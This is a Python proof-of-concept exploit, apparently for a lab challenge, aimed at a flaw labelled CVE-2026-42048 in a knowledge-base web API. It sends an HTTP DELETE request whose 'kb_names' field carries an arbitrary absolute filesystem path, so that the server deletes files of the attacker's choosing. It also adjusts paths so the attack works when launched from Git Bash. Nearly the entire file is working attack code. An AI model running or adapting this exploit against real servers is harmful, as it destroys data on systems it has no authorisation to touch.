#!/usr/bin/env python3 import argparse import json import re import urllib.error import urllib.request DEFAULT_DELETE_PATH = "/target/CVE-2026-42048" def normalize_url(value): value = value.strip().rstrip("/") if not value: raise ValueError("empty URL") if not value.startswith(("http://", "https://")): value = f"http://{value}" return value def normalize_delete_path(value): value = value.strip() # Git Bash/MSYS automatically rewrites POSIX-looking absolute paths in # command arguments, e.g. /target/x -> C:/Program Files/Git/target/x. # The vulnerable server is Linux-based, so restore the intended path. converted = re.search(r"^[A-Za-z]:/.*/target/(.+)$", value) if converted: return f"/target/{converted.group(1)}" return value def send_delete(base_url, delete_path): payload = json.dumps({"kb_names": [delete_path]}).encode() req = urllib.request.Request( f"{base_url}/api/v1/knowledge_bases", data=payload, headers={"Content-Type": "application/json"}, method="DELETE", ) with urllib.request.urlopen(req, timeout=15) as resp: body = resp.read().decode("utf-8", errors="replace") return resp.status, body def main(): parser = argparse.ArgumentParser(description="CVE-2026-42048 lab PoC") parser.add_argument("--url", help="Vulnerable challenge URL, for example http://10.10.10.20:9101") parser.add_argument("--path", help=f"Path to delete via kb_names. Default: {DEFAULT_DELETE_PATH}") args = parser.parse_args() base_url = normalize_url(args.url or input("Vulnerable URL: ")) delete_path = normalize_delete_path(args.path or input(f"Path to delete [{DEFAULT_DELETE_PATH}]: ")) if not delete_path: delete_path = DEFAULT_DELETE_PATH print(f"[*] Target: {base_url}") print(f"[*] Deleting kb_names path: {delete_path}") try: status, body = send_delete(base_url, delete_path) except urllib.error.HTTPError as exc: error_body = exc.read().decode("utf-8", errors="replace") print(f"[-] DELETE failed: HTTP {exc.code}") print(error_body) return print(f"[+] DELETE returned HTTP {status}") if body: print(body) if __name__ == "__main__": main()